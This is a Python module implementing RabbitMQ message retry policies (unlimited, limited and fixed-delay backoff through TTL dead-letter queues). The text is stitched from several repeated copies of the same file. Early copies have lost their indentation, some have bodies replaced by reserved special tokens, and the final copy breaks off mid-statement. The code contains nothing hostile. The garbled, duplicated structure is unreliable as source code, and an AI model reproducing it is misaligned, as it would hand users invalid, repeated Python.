self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning(
'Retry handling message [{}] after {}s; death count: {}'.
format(envelope.message_id, delay, death_count + 1))
else:
logger.warning('Message [{}] exceeded retry limit; death count: {}'
.format(envelope.message_id, death_count + 1))
self.consumer.channel.basic_reject(envelope.delivery_tag,
requeue=False)
logger.error('Message [{}] is rejected'.format(envelope.message_id)
)
class FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):
"""Fixed delay unlimited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
unlimited retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=
consumer, initial_delay=delay, max_delay=delay,
delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,
**kwargs)
class FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):
"""Fixed delay limited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
limited number of retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds.
:attr:`retries_limit`: retries limit count.
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=
'retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param int retries_limit: retries limit count
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert retries_limit > 0
retry_delays = tuple([delay] * retries_limit)
super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=
consumer, retry_delays=retry_delays, retry_queue_suffix=
retry_queue_suffix, **kwargs)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class UnlimitedRetriesPolicy(BaseRetryPolicy):
<|reserved_special_token_0|>
def __init__(self, consumer, initial_delay, max_delay,
delay_incremented_by, retry_queue_suffix='retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int initial_delay: `initial_delay` is the initial/first backoff delay
in seconds.
:param int max_delay: `max_delay` is the final/maximum backoff delay in seconds
that should net be exceeded. When exceeded, this max is used.
:param int delay_incremented_by: `delay_incremented_by` is number of seconds
the backoff should be incremented by after each death.
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
super(UnlimitedRetriesPolicy, self).__init__(consumer,
retry_queue_suffix, **kwargs)
assert initial_delay >= 0
assert delay_incremented_by >= 0
assert max_delay >= initial_delay
self.initial_delay = initial_delay
self.max_delay = max_delay
self.delay_incremented_by = delay_incremented_by
def retry(self, envelope):
"""Send message to retry queue to retry handling it later.
Death count is calculated by examining 'x-death' header. Based on the death
count, the message is sent to a retry queue where it waits there till it
expires and gets sent back to the original queue for handling retry.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
delay = self.initial_delay + death_count * self.delay_incremented_by
if delay > self.max_delay:
delay = self.max_delay
retry_queue_name = self.declare_retry_queue(delay)
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(exchange='', routing_key=
retry_queue_name, properties=envelope.properties, body=envelope
.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning('Retry handling message [{}] after {}s; death count: {}'
.format(envelope.message_id, delay, death_count + 1))
class LimitedRetriesPolicy(BaseRetryPolicy):
"""Limited Retries Policy.
This is an implementation of :class:`.RetryPolicy` which does incremental backoff,
limited number of retries.
:attr:`consumer`: message consumer instance
:attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message
is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',
**kwargs):
"""
:param Consumer consumer: message consumer instance
:param Iterable[int] retry_delays: Immutable list of retry backoff delays in
seconds. Message is sent to dlx when this list is exhausted.
e.g ``(1, 5, 10, 60, 5 * 60)``
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert len(retry_delays) > 0
super(LimitedRetriesPolicy, self).__init__(consumer,
retry_queue_suffix, **kwargs)
self.retry_delays = retry_delays
def retry(self, envelope):
"""Send message to retry queue to retry handling it later.
Death count is calculated by examining 'x-death' header. Based on the death
count, the message is sent to a retry queue where it waits there till it
expires and gets sent back to the original queue for handling retry.
The death count is used as an index for `retry_delays` list. Where each
item in the list represents a retry delay in seconds.
The message will be rejected if the death count exceeded the length of
`retry_delays` list.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
if death_count < len(self.retry_delays):
delay = self.retry_delays[death_count]
retry_queue_name = self.declare_retry_queue(delay)
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(exchange='', routing_key=
retry_queue_name, properties=envelope.properties, body=
envelope.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning(
'Retry handling message [{}] after {}s; death count: {}'.
format(envelope.message_id, delay, death_count + 1))
else:
logger.warning('Message [{}] exceeded retry limit; death count: {}'
.format(envelope.message_id, death_count + 1))
self.consumer.channel.basic_reject(envelope.delivery_tag,
requeue=False)
logger.error('Message [{}] is rejected'.format(envelope.message_id)
)
class FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):
"""Fixed delay unlimited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
unlimited retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=
consumer, initial_delay=delay, max_delay=delay,
delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,
**kwargs)
class FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):
"""Fixed delay limited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
limited number of retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds.
:attr:`retries_limit`: retries limit count.
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=
'retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param int retries_limit: retries limit count
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert retries_limit > 0
retry_delays = tuple([delay] * retries_limit)
super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=
consumer, retry_delays=retry_delays, retry_queue_suffix=
retry_queue_suffix, **kwargs)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BaseRetryPolicy(RetryPolicy):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class UnlimitedRetriesPolicy(BaseRetryPolicy):
"""Unlimited Retries Policy.
This is an implementation of :class:`.RetryPolicy` which does incremental backoff,
unlimited retries.
:attr:`initial_delay`: is the initial/first backoff delay in seconds
:attr:`delay_incremented_by`: is number of seconds the backoff should be incremented
by after each death
:attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be
exceeded
"""
def __init__(self, consumer, initial_delay, max_delay,
delay_incremented_by, retry_queue_suffix='retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int initial_delay: `initial_delay` is the initial/first backoff delay
in seconds.
:param int max_delay: `max_delay` is the final/maximum backoff delay in seconds
that should net be exceeded. When exceeded, this max is used.
:param int delay_incremented_by: `delay_incremented_by` is number of seconds
the backoff should be incremented by after each death.
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
super(UnlimitedRetriesPolicy, self).__init__(consumer,
retry_queue_suffix, **kwargs)
assert initial_delay >= 0
assert delay_incremented_by >= 0
assert max_delay >= initial_delay
self.initial_delay = initial_delay
self.max_delay = max_delay
self.delay_incremented_by = delay_incremented_by
def retry(self, envelope):
"""Send message to retry queue to retry handling it later.
Death count is calculated by examining 'x-death' header. Based on the death
count, the message is sent to a retry queue where it waits there till it
expires and gets sent back to the original queue for handling retry.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
delay = self.initial_delay + death_count * self.delay_incremented_by
if delay > self.max_delay:
delay = self.max_delay
retry_queue_name = self.declare_retry_queue(delay)
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(exchange='', routing_key=
retry_queue_name, properties=envelope.properties, body=envelope
.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning('Retry handling message [{}] after {}s; death count: {}'
.format(envelope.message_id, delay, death_count + 1))
class LimitedRetriesPolicy(BaseRetryPolicy):
"""Limited Retries Policy.
This is an implementation of :class:`.RetryPolicy` which does incremental backoff,
limited number of retries.
:attr:`consumer`: message consumer instance
:attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message
is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',
**kwargs):
"""
:param Consumer consumer: message consumer instance
:param Iterable[int] retry_delays: Immutable list of retry backoff delays in
seconds. Message is sent to dlx when this list is exhausted.
e.g ``(1, 5, 10, 60, 5 * 60)``
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert len(retry_delays) > 0
super(LimitedRetriesPolicy, self).__init__(consumer,
retry_queue_suffix, **kwargs)
self.retry_delays = retry_delays
def retry(self, envelope):
"""Send message to retry queue to retry handling it later.
Death count is calculated by examining 'x-death' header. Based on the death
count, the message is sent to a retry queue where it waits there till it
expires and gets sent back to the original queue for handling retry.
The death count is used as an index for `retry_delays` list. Where each
item in the list represents a retry delay in seconds.
The message will be rejected if the death count exceeded the length of
`retry_delays` list.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
if death_count < len(self.retry_delays):
delay = self.retry_delays[death_count]
retry_queue_name = self.declare_retry_queue(delay)
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(exchange='', routing_key=
retry_queue_name, properties=envelope.properties, body=
envelope.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning(
'Retry handling message [{}] after {}s; death count: {}'.
format(envelope.message_id, delay, death_count + 1))
else:
logger.warning('Message [{}] exceeded retry limit; death count: {}'
.format(envelope.message_id, death_count + 1))
self.consumer.channel.basic_reject(envelope.delivery_tag,
requeue=False)
logger.error('Message [{}] is rejected'.format(envelope.message_id)
)
class FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):
"""Fixed delay unlimited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
unlimited retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=
consumer, initial_delay=delay, max_delay=delay,
delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,
**kwargs)
class FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):
"""Fixed delay limited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
limited number of retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds.
:attr:`retries_limit`: retries limit count.
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=
'retry', **kwargs):
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param int retries_limit: retries limit count
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert retries_limit > 0
retry_delays = tuple([delay] * retries_limit)
super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=
consumer, retry_delays=retry_delays, retry_queue_suffix=
retry_queue_suffix, **kwargs)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RetryPolicy(object):
<|reserved_special_token_0|>
def __init__(self, **kwargs):
super(RetryPolicy, self).__init__()
def retry(self, envelope):
"""This method is implemented by the subclass."""
raise NotImplementedError()
class BaseRetryPolicy(RetryPolicy):
    """Base retry policy class for :class:`.UnlimitedRetriesPolicy` and
    :class:`.LimitedRetriesPolicy`.
    It implements getting the message death count and retry queue creation.
    """
    def __init__(self, consumer, retry_queue_suffix='retry', **kwargs):
        """
        :param Consumer consumer: message consumer instance
        :param str retry_queue_suffix: Suffix used when creating retry queues. Retry
            queue names are constructed in this form "queue_name.<suffix>.<delay>".
            Optional, default to ``retry``
        """
        super(BaseRetryPolicy, self).__init__(**kwargs)
        retry_queue_suffix = retry_queue_suffix.strip()
        self.consumer = consumer
        # An all-whitespace suffix would collide retry queue names with the
        # source queue name, so reject it outright.
        assert len(retry_queue_suffix) > 0
        self.retry_queue_suffix = retry_queue_suffix
        # Floor (in ms) for a retry queue's 'x-expires'; keeps very short
        # retry delays from causing constant queue create/destroy churn.
        self.min_retry_queue_ttl = 20 * 1000
    def set_original_delivery_info_header(self, envelope):
        """Save the original message delivery information in a header.
        Writes the 'x-original-delivery-info' header only once: if the header
        is already present (the message has been through a retry queue
        before), the original values are left untouched.
        """
        if not envelope.get_header('x-original-delivery-info'):
            original_delivery_info = {'consumer_tag': envelope.
                delivery_info.consumer_tag, 'delivery_tag': envelope.
                delivery_info.delivery_tag, 'redelivered': envelope.
                delivery_info.redelivered, 'exchange': envelope.
                delivery_info.exchange, 'routing_key': envelope.
                delivery_info.routing_key}
            envelope.set_header('x-original-delivery-info',
                original_delivery_info)
    def get_death_count(self, envelope):
        """Return the death count of a message by examining "x-death" header.
        Only deaths whose queue name starts with this consumer's queue name
        are counted, so deaths recorded in this queue's own retry queues
        ("<queue>.<suffix>.<delay>") are included while deaths that happened
        in unrelated queues are ignored.
        :param Envelope envelope: Message envelope
        :return int: death count
        """
        death_header = envelope.get_header('x-death')
        if death_header is None:
            return 0
        count = 0
        for death in death_header:
            if not death['queue'].startswith(self.consumer.queue_name):
                continue
            # Some broker versions omit 'count' in x-death entries; treat a
            # bare entry as a single death.
            count += death.get('count', 1)
        return count
    def declare_retry_queue(self, delay):
        """Declare (or redeclare) the retry queue for the given delay.
        Each distinct delay gets its own queue, where retry messages wait
        until their per-message TTL ('x-message-ttl') expires; the queue's
        dead-letter settings then route them through the default exchange
        back to the original queue for another handling attempt. The queue
        also carries 'x-expires' so an idle retry queue is deleted
        automatically by the broker.
        The retry queue is redeclared before every new message is sent to
        it; redeclaration resets the queue's expiry, preventing it from
        being destroyed while still in use.
        :param int delay: Retry delay in seconds
        :return: retry queue name
        :rtype: str
        """
        delay_in_ms = int(delay * 1000)
        retry_queue_name = '{}.{}.{}'.format(self.consumer.queue_name, self
            .retry_queue_suffix, delay_in_ms)
        # Keep the queue alive at least twice the delay — and never below the
        # configured floor — so it outlives the messages parked in it.
        queue_ttl = delay_in_ms * 2
        if queue_ttl < self.min_retry_queue_ttl:
            queue_ttl = self.min_retry_queue_ttl
        self.consumer.channel.queue_declare(callback=None, queue=
            retry_queue_name, durable=self.consumer.durable, nowait=True,
            arguments={'x-dead-letter-exchange': '',
            'x-dead-letter-routing-key': self.consumer.queue_name,
            'x-message-ttl': delay_in_ms, 'x-expires': queue_ttl})
        logger.warning('Retry queue "{}" is created/redeclared'.format(
            retry_queue_name))
        return retry_queue_name
class UnlimitedRetriesPolicy(BaseRetryPolicy):
    """Incremental-backoff retry policy with no retry cap.

    Each death adds ``delay_incremented_by`` seconds to the backoff, starting
    at ``initial_delay`` and clamped at ``max_delay``.  Messages are retried
    forever; this policy never dead-letters them.
    """

    def __init__(self, consumer, initial_delay, max_delay,
        delay_incremented_by, retry_queue_suffix='retry', **kwargs):
        """
        :param Consumer consumer: message consumer instance
        :param int initial_delay: first backoff delay, in seconds
        :param int max_delay: upper bound for the backoff delay, in seconds;
            once reached, it is used for all further retries
        :param int delay_incremented_by: seconds added to the backoff after
            each death
        :param: str retry_queue_suffix: suffix used when naming retry queues.
        """
        super(UnlimitedRetriesPolicy, self).__init__(consumer,
            retry_queue_suffix, **kwargs)
        # Zero initial delay (immediate retry) is allowed, but the
        # schedule's bounds must be coherent.
        assert initial_delay >= 0
        assert delay_incremented_by >= 0
        assert max_delay >= initial_delay
        self.initial_delay = initial_delay
        self.max_delay = max_delay
        self.delay_incremented_by = delay_incremented_by

    def retry(self, envelope):
        """Park the message in a TTL'd retry queue for a later attempt.

        The backoff grows linearly with the death count taken from the
        message's 'x-death' header; once it reaches ``max_delay`` it stays
        there.

        :param Envelope envelope: Message envelope
        """
        deaths = self.get_death_count(envelope)
        backoff = min(self.initial_delay + deaths * self.delay_incremented_by,
                      self.max_delay)
        queue = self.declare_retry_queue(backoff)
        # Record the original delivery details the first time through only.
        if envelope.get_header('x-original-delivery-info') is None:
            self.set_original_delivery_info_header(envelope)
        # Publish a copy to the retry queue via the default exchange, then
        # ack the current delivery so it leaves the source queue.
        self.consumer.channel.basic_publish(
            exchange='',
            routing_key=queue,
            properties=envelope.properties,
            body=envelope.payload)
        self.consumer.channel.basic_ack(envelope.delivery_tag)
        logger.warning('Retry handling message [{}] after {}s; death count: {}'
            .format(envelope.message_id, backoff, deaths + 1))
class LimitedRetriesPolicy(BaseRetryPolicy):
    """Incremental-backoff retry policy with a bounded number of attempts.

    ``retry_delays`` spells out the backoff schedule, one entry per retry.
    When the schedule is exhausted the message is rejected and dead-lettered.
    """

    def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',
        **kwargs):
        """
        :param Consumer consumer: message consumer instance
        :param Iterable[int] retry_delays: immutable sequence of backoff
            delays in seconds, e.g. ``(1, 5, 10, 60, 5 * 60)``.  Its length
            is the maximum number of retries; the message is sent to dlx
            once it is exhausted.
        :param: str retry_queue_suffix: suffix used when naming retry queues.
        """
        assert len(retry_delays) > 0
        super(LimitedRetriesPolicy, self).__init__(consumer,
            retry_queue_suffix, **kwargs)
        self.retry_delays = retry_delays

    def retry(self, envelope):
        """Retry the message later, or reject it once retries are exhausted.

        The death count (derived from the 'x-death' header) indexes straight
        into ``retry_delays``; past the end of the schedule the message is
        rejected with ``requeue=False`` so the broker dead-letters it.

        :param Envelope envelope: Message envelope
        """
        deaths = self.get_death_count(envelope)
        if deaths >= len(self.retry_delays):
            # Schedule exhausted -- give up on this message.
            logger.warning('Message [{}] exceeded retry limit; death count: {}'
                .format(envelope.message_id, deaths + 1))
            self.consumer.channel.basic_reject(envelope.delivery_tag,
                requeue=False)
            logger.error('Message [{}] is rejected'.format(envelope.message_id))
            return
        backoff = self.retry_delays[deaths]
        queue = self.declare_retry_queue(backoff)
        # Record the original delivery details the first time through only.
        if envelope.get_header('x-original-delivery-info') is None:
            self.set_original_delivery_info_header(envelope)
        # Publish a copy to the retry queue via the default exchange, then
        # ack the current delivery so it leaves the source queue.
        self.consumer.channel.basic_publish(
            exchange='',
            routing_key=queue,
            properties=envelope.properties,
            body=envelope.payload)
        self.consumer.channel.basic_ack(envelope.delivery_tag)
        logger.warning('Retry handling message [{}] after {}s; death count: {}'
            .format(envelope.message_id, backoff, deaths + 1))
class FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):
    """Constant-backoff retry policy with no retry cap.

    Thin convenience wrapper around :class:`.UnlimitedRetriesPolicy` that
    pins the backoff to a single fixed ``delay``.
    """

    def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):
        """
        :param Consumer consumer: message consumer instance
        :param int delay: fixed retry delay, in seconds
        :param: str retry_queue_suffix: suffix used when naming retry queues.
        """
        # initial == max with a zero increment makes the delay constant.
        super(FixedDelayUnlimitedRetriesPolicy, self).__init__(
            consumer=consumer,
            initial_delay=delay,
            max_delay=delay,
            delay_incremented_by=0,
            retry_queue_suffix=retry_queue_suffix,
            **kwargs)
class FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):
    """Constant-backoff retry policy with a bounded number of attempts.

    Thin convenience wrapper around :class:`.LimitedRetriesPolicy` that
    repeats one fixed ``delay`` for ``retries_limit`` attempts.
    """

    def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=
        'retry', **kwargs):
        """
        :param Consumer consumer: message consumer instance
        :param int delay: fixed retry delay, in seconds
        :param int retries_limit: maximum number of retries
        :param: str retry_queue_suffix: suffix used when naming retry queues.
        """
        assert retries_limit > 0
        # Expand the fixed delay into the explicit schedule the parent
        # policy expects.
        super(FixedDelayLimitedRetriesPolicy, self).__init__(
            consumer=consumer,
            retry_delays=(delay,) * retries_limit,
            retry_queue_suffix=retry_queue_suffix,
            **kwargs)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""
Nothing is perfect: errors and timeouts may happen, and when such failures happen, the
consumer has to decide what to do with them. By default, the consumer rejects the
envelope (RabbitMQ message) when a failure happens. However, error and timeout
issues, unless there is a software bug, are usually solved with retries. Just like the
routing, the consumer doesn't make the retry decision itself; the consumer delegates
it to a retry policy. A retry policy defines how the retry is performed. Retries
usually happen with back-offs to avoid worsening the situation by hammering other
services with more requests, especially if it was a timeout issue. The consumer can be
configured to use a retry policy by calling :meth:`.Consumer.set_retry_policy`, passing
an instance of :class:`.RetryPolicy`. When a retry policy is set, the consumer won't
reject messages; rather, it sends them to the retry policy to deal with the
situation by invoking the :meth:`.RetryPolicy.retry` method. Based on its implementation,
the retry policy decides how to do retries.
There are 4 different retry policies available:
1. :class:`.UnlimitedRetriesPolicy`, Unlimited retries policy
2. :class:`.LimitedRetriesPolicy`, Limited retries policy
3. :class:`.FixedDelayUnlimitedRetriesPolicy`, Fixed delay unlimited retries policy
4. :class:`.FixedDelayLimitedRetriesPolicy`, Fixed delay limited retries policy
Custom retry policies can be created by implementing the base class
:class:`.RetryPolicy`
"""
import logging
logger = logging.getLogger(__name__)
class RetryPolicy(object):
    """Abstract interface for message retry strategies.

    Concrete policies must override :meth:`retry`, which decides what
    happens to a message whose handling failed.
    """

    def __init__(self, **kwargs):
        # type: (RetryPolicy) -> None
        # Extra keyword arguments are accepted (and ignored) so that
        # cooperative multiple-inheritance chains can pass options through.
        super(RetryPolicy, self).__init__()

    def retry(self, envelope):
        # type: (RetryPolicy, Envelope) -> None
        """Handle a failed message; subclasses provide the behavior."""
        raise NotImplementedError()
class BaseRetryPolicy(RetryPolicy):
    """Shared machinery for :class:`.UnlimitedRetriesPolicy` and
    :class:`.LimitedRetriesPolicy`.

    Provides death-count extraction from the "x-death" header and
    creation/redeclaration of per-delay retry queues.
    """

    def __init__(self, consumer, retry_queue_suffix='retry', **kwargs):
        # type: (BaseRetryPolicy, Consumer, str) -> None
        """
        :param Consumer consumer: message consumer instance

        :param str retry_queue_suffix: suffix used when naming retry queues.
            Retry queue names take the form "queue_name.<suffix>.<delay>".
            Optional, defaults to ``retry``
        """
        super(BaseRetryPolicy, self).__init__(**kwargs)
        suffix = retry_queue_suffix.strip()
        self.consumer = consumer
        assert len(suffix) > 0
        self.retry_queue_suffix = suffix
        # Keep retry queues alive for at least 20 seconds so that short
        # retry delays do not cause constant queue create/destroy churn.
        self.min_retry_queue_ttl = 20 * 1000

    def set_original_delivery_info_header(self, envelope):
        # type: (BaseRetryPolicy, Envelope) -> None
        """Stash the message's original delivery details in a header, once."""
        if envelope.get_header('x-original-delivery-info'):
            return
        info = envelope.delivery_info
        envelope.set_header('x-original-delivery-info', {
            'consumer_tag': info.consumer_tag,
            'delivery_tag': info.delivery_tag,
            'redelivered': info.redelivered,
            'exchange': info.exchange,
            'routing_key': info.routing_key
        })

    def get_death_count(self, envelope):
        # type: (BaseRetryPolicy, Envelope) -> int
        """Return the message's death count from the "x-death" header.

        Only deaths on queues whose name starts with the consumer's queue
        name are counted (retry queues share that prefix).

        :param Envelope envelope: Message envelope

        :return int: death count
        """
        deaths = envelope.get_header('x-death')
        if deaths is None:
            return 0
        return sum(
            death.get('count', 1)
            for death in deaths
            if death['queue'].startswith(self.consumer.queue_name))

    def declare_retry_queue(self, delay):
        # type: (BaseRetryPolicy, int) -> str
        """Declare (or redeclare) the retry queue for the given delay.

        Each distinct delay gets its own queue; retry messages wait there
        until they expire and are dead-lettered back to the original queue.
        The queue's message TTL equals the delay, its dead-letter exchange
        is the (default) direct exchange, and its dead-letter routing key is
        the original queue name, so expired messages return home for retry.

        The queue itself auto-expires; redeclaring it before each publish
        resets that expiry, keeping it alive while it is in use.

        :param int delay: Retry delay in seconds

        :return: retry queue name
        :rtype: str
        """
        ttl_ms = int(delay * 1000)
        queue_name = '{}.{}.{}'.format(
            self.consumer.queue_name, self.retry_queue_suffix, ttl_ms)
        # Queue auto-expiry: twice the message TTL, floored at the minimum
        # to avoid churn for very short delays.
        expires = max(ttl_ms * 2, self.min_retry_queue_ttl)
        self.consumer.channel.queue_declare(
            callback=None,
            queue=queue_name,
            durable=self.consumer.durable,
            nowait=True,
            arguments={
                'x-dead-letter-exchange': '',
                'x-dead-letter-routing-key': self.consumer.queue_name,
                'x-message-ttl': ttl_ms,
                'x-expires': expires
            })
        logger.warning(
            'Retry queue "{}" is created/redeclared'.format(queue_name))
        return queue_name
class UnlimitedRetriesPolicy(BaseRetryPolicy):
    """Incremental-backoff retry policy with no retry limit.

    The first retry waits :attr:`initial_delay` seconds; every subsequent
    death adds :attr:`delay_incremented_by` seconds, clamped at
    :attr:`max_delay`. Messages are never rejected by this policy.
    """

    def __init__(self,
                 consumer,
                 initial_delay,
                 max_delay,
                 delay_incremented_by,
                 retry_queue_suffix='retry',
                 **kwargs):
        # type: (UnlimitedRetriesPolicy, Consumer, int, int, int, str) -> None
        """
        :param Consumer consumer: message consumer instance

        :param int initial_delay: first backoff delay, in seconds.

        :param int max_delay: upper bound on the backoff delay in seconds;
            larger computed delays are clamped to this value.

        :param int delay_incremented_by: seconds added to the backoff after
            each death.

        :param: str retry_queue_suffix: suffix used when naming retry queues.
        """
        super(UnlimitedRetriesPolicy, self).__init__(
            consumer, retry_queue_suffix, **kwargs)
        assert initial_delay >= 0
        assert delay_incremented_by >= 0
        assert max_delay >= initial_delay
        self.initial_delay = initial_delay
        self.max_delay = max_delay
        self.delay_incremented_by = delay_incremented_by

    def retry(self, envelope):
        # type: (UnlimitedRetriesPolicy, Envelope) -> None
        """Publish the message to a retry queue for a later attempt.

        The death count (taken from the 'x-death' header) determines the
        backoff delay; the message waits in the matching retry queue until
        it expires back to the original queue for another attempt.

        :param Envelope envelope: Message envelope
        """
        death_count = self.get_death_count(envelope)
        delay = min(
            self.initial_delay + death_count * self.delay_incremented_by,
            self.max_delay)
        retry_queue_name = self.declare_retry_queue(delay)
        # Preserve the first delivery's metadata before republishing.
        if envelope.get_header('x-original-delivery-info') is None:
            self.set_original_delivery_info_header(envelope)
        self.consumer.channel.basic_publish(
            exchange='',
            routing_key=retry_queue_name,
            properties=envelope.properties,
            body=envelope.payload)
        self.consumer.channel.basic_ack(envelope.delivery_tag)
        logger.warning(
            'Retry handling message [{}] after {}s; death count: {}'.format(
                envelope.message_id, delay, death_count + 1))
class LimitedRetriesPolicy(BaseRetryPolicy):
    """Incremental-backoff retry policy with a bounded number of retries.

    :attr:`consumer`: message consumer instance

    :attr:`retry_delays`: immutable sequence of retry backoff delays in
        seconds. The message is dead-lettered when this sequence is
        exhausted, e.g ``(1, 5, 10, 60, 5 * 60)``

    :attr:`retry_queue_suffix`: suffix str used when naming retry queues.
    """

    def __init__(self,
                 consumer,
                 retry_delays,
                 retry_queue_suffix='retry',
                 **kwargs):
        # type: (LimitedRetriesPolicy, Consumer, Iterable[int], str) -> None
        """
        :param Consumer consumer: message consumer instance

        :param Iterable[int] retry_delays: immutable sequence of retry
            backoff delays in seconds. The message is dead-lettered when
            this sequence is exhausted, e.g ``(1, 5, 10, 60, 5 * 60)``

        :param: str retry_queue_suffix: suffix used when naming retry queues.
        """
        assert len(retry_delays) > 0
        super(LimitedRetriesPolicy, self).__init__(
            consumer, retry_queue_suffix, **kwargs)
        self.retry_delays = retry_delays

    def retry(self, envelope):
        # type: (LimitedRetriesPolicy, Envelope) -> None
        """Publish the message to a retry queue, or reject it.

        The death count (taken from the 'x-death' header) indexes into
        `retry_delays`, each entry being a retry delay in seconds. The
        message waits in the matching retry queue until it expires back to
        the original queue. Once the death count runs past the end of
        `retry_delays`, the message is rejected without requeueing.

        :param Envelope envelope: Message envelope
        """
        death_count = self.get_death_count(envelope)
        if death_count >= len(self.retry_delays):
            # Retries exhausted: reject so the broker can dead-letter it.
            logger.warning(
                'Message [{}] exceeded retry limit; death count: {}'.format(
                    envelope.message_id, death_count + 1))
            self.consumer.channel.basic_reject(
                envelope.delivery_tag, requeue=False)
            logger.error('Message [{}] is rejected'.format(envelope.message_id))
            return
        delay = self.retry_delays[death_count]
        retry_queue_name = self.declare_retry_queue(delay)
        # Preserve the first delivery's metadata before republishing.
        if envelope.get_header('x-original-delivery-info') is None:
            self.set_original_delivery_info_header(envelope)
        self.consumer.channel.basic_publish(
            exchange='',
            routing_key=retry_queue_name,
            properties=envelope.properties,
            body=envelope.payload)
        self.consumer.channel.basic_ack(envelope.delivery_tag)
        logger.warning(
            'Retry handling message [{}] after {}s; death count: {}'.format(
